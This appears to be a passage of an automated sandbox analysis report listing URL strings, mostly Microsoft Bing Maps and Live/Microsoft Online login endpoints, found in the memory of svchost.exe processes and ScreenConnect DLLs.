                        Source: svchost.exe, 0000000A.00000003.1385602822.0000025C08A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1385739803.0000025C08A5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386365146.0000025C08A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386238553.0000025C08A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                        Source: svchost.exe, 0000000A.00000003.1385583169.0000025C08A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386394140.0000025C08A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386238553.0000025C08A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                        Source: svchost.exe, 0000000A.00000003.1385602822.0000025C08A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386365146.0000025C08A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386238553.0000025C08A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                        Source: svchost.exe, 0000000A.00000003.1385756682.0000025C08A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386291943.0000025C08A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                        Source: svchost.exe, 0000000A.00000003.1385602822.0000025C08A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386365146.0000025C08A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                        Source: ScreenConnect.WindowsCredentialProvider.dll.4.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                        Source: svchost.exe, 0000000A.00000003.1385451110.0000025C08A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                        Source: svchost.exe, 0000000A.00000002.1386291943.0000025C08A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 0000000A.00000003.1385602822.0000025C08A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386365146.0000025C08A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 0000000A.00000003.1385756682.0000025C08A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386291943.0000025C08A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                        Source: svchost.exe, 0000000A.00000002.1386291943.0000025C08A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                        Source: svchost.exe, 0000000A.00000003.1385706569.0000025C08A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                        Source: svchost.exe, 0000000A.00000003.1385451110.0000025C08A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                        Source: svchost.exe, 0000000A.00000003.1385583169.0000025C08A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386394140.0000025C08A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1386238553.0000025C08A2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                        Source: ScreenConnect.Core.dll.6.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
                        Source: svchost.exe, 00000011.00000002.2475454107.000002B56147E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2475340058.000002B56144A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1323106947.000002B561449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: svchost.exe, 00000011.00000002.2474584572.000002B5604B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfs
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                        Source: svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf53457
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                        Source: svchost.exe, 00000011.00000002.2474584572.000002B5604B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B5604AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                        Source: svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                        Source: svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                        Source: svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getush
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/p
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                        Source: svchost.exe, 00000011.00000003.1301654508.000002B560D10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                        Source: svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfuer
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/Inlih
                        Source: svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                        Source: svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302476639.000002B560D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                        Source: svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806005
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806011
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                        Source: svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                        Source: svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                        Source: svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302196987.000002B560D57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=8060P
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                        Source: svchost.exe, 00000011.00000003.1301830358.000002B560D5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                        Source: svchost.exe, 00000011.00000003.1302650743.000002B560D56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1301895243.000002B560D52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302834084.000002B560D2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                        Source: svchost.exe, 00000011.00000003.1301654508.000002B560D10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                        Source: svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                        Source: svchost.exe, 00000011.00000003.1303457308.000002B560D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                        Source: svchost.exe, 00000011.00000002.2474745682.000002B560502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.livm/ppsecu
                        Source: svchost.exe, 00000011.00000003.1302283763.000002B560D40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2474255889.000002B56045F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302146142.000002B560D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                        Source: svchost.exe, 00000011.00000003.1302112565.000002B560D4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1302359399.000002B560D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                        Source: svchost.exe, 00000011.00000002.2474216602.000002B560440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                        Source: svchost.exe, 00000011.00000003.1301654508.000002B560D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
